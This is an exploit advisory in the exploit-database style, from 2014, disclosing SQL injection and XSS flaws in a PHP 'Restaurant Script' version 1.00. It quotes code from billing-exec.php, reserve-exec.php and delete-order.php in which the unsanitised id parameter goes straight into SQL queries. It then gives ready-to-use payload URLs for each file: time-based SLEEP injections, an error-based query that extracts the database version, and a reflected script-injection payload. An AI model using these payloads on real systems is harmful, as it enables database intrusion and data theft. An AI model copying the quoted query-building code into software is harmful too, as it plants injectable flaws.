# Exploit Title: ©2014 RESTAURANT SCRIPT. ALL RIGHTS RESERVED - SQL Injection Vulnerabilty
# Date : 22-10-2014
# Author : jsass
# Software Link:​ http://sourceforge.net/projects/restaurantmis/files/
# Version: ​1.00
# Tested on: kali linux
# Twitter : @KwSecurity
# Group : Q8 GRAY HAT TEAM
###########
SQL INJECTION
[1] billing-exec.php
code :
function clean($str) {
$str = @trim($str);
if(get_magic_quotes_gpc()) {
$str = stripslashes($str);
}
return mysql_real_escape_string($str);
}
//Sanitize the POST values
$StreetAddress = clean($_POST['sAddress']);
$BoxNo = clean($_POST['box']);
$City = clean($_POST['city']);
$MobileNo = clean($_POST['mNumber']);
$LandlineNo = clean($_POST['lNumber']);
// check if the 'id' variable is set in URL
// check if the 'id' variable is set in URL
if (isset($_GET['id']))
{
// get id value
$id = $_GET['id'];
//Create INSERT query
$qry = "INSERT INTO billing_details(member_id,Street_Address,P_O_Box_No,City,Mobile_No,Landline_No) VALUES('$id','$StreetAddress','$BoxNo','$City','$MobileNo','$LandlineNo')";
mysql_query($qry) ;
Exploit :
http://localhost/RSv1.0.0/billing-exec.php?id=1' AND SLEEP(5) AND 'Q8'='Q8
[2] reserve-exec.php
function clean($str) {
$str = @trim($str);
if(get_magic_quotes_gpc()) {
$str = stripslashes($str);
}
return mysql_real_escape_string($str);
}
if(isset($_POST['table'])){
$table_id = clean($_POST['table']);
$table_flag = 1;
}
else if(isset($_POST['partyhall'])){
$partyhall_id = clean($_POST['partyhall']);
$partyhall_flag = 1;
}
if (isset($_GET['id'])){
//get user id
$id = $_GET['id'];
//Create INSERT query
$qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')";
mysql_query($qry);
//redirect to the reserve success page
header("location: reserve-success.php");
}else {
die("Reservation failed! Please try again after a few minutes.");
}
You Can Inject by time-based blind
Or Use Sqlmap ...
Exploit : http://localhost/RSv1.0.0/reserve-exec.php?id=1' AND SLEEP(5) AND 'Q8'='Q8
[3] delete-order.php
// check if the 'id' variable is set in URL
if (isset($_GET['id']))
{
// get id value
$id = $_GET['id'];
// delete the entry
$result = mysql_query("DELETE FROM orders_details WHERE order_id='$id'");
or die("The order does not exist ... \n");
// redirect back to the member index
header("Location: member-index.php");
}
else
// if id isn't set, redirect back to member index
{
header("Location: member-index.php");
}
time-based blind & boolean-based blind & error-based
Exploit : http://localhost/RSv1.0.0/delete-order.php?id=1' AND (SELECT 1414 FROM(SELECT COUNT(*),CONCAT(0x5138203e3e,Version(),0x3c3c205138,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Q8'='Q8
AND XSS
http://localhost/RSv1.0.0/delete-order.php?id=1'><script>alert('jsass')</script>
[4] reserve-exec.php
if(isset($_POST['table'])){
$table_id = clean($_POST['table']);
$table_flag = 1;
}
else if(isset($_POST['partyhall'])){
$partyhall_id = clean($_POST['partyhall']);
$partyhall_flag = 1;
}
$date = clean($_POST['date']);
$time = clean($_POST['time']);
//check if the id is set at the link
if (isset($_GET['id'])){
//get user id
$id = $_GET['id'];
//Create INSERT query
$qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')";
mysql_query($qry);
//redirect to the reserve success page
header("location: reserve-success.php");
}else {
die("Reservation failed! Please try again after a few minutes.");
}
Exploit : http://localhost/RSv1.0.0/reserve-exec.php?id=16' AND SLEEP(5) AND 'Q8'='Q8
###########
Greats : Sec4ever.com & alm3refh.com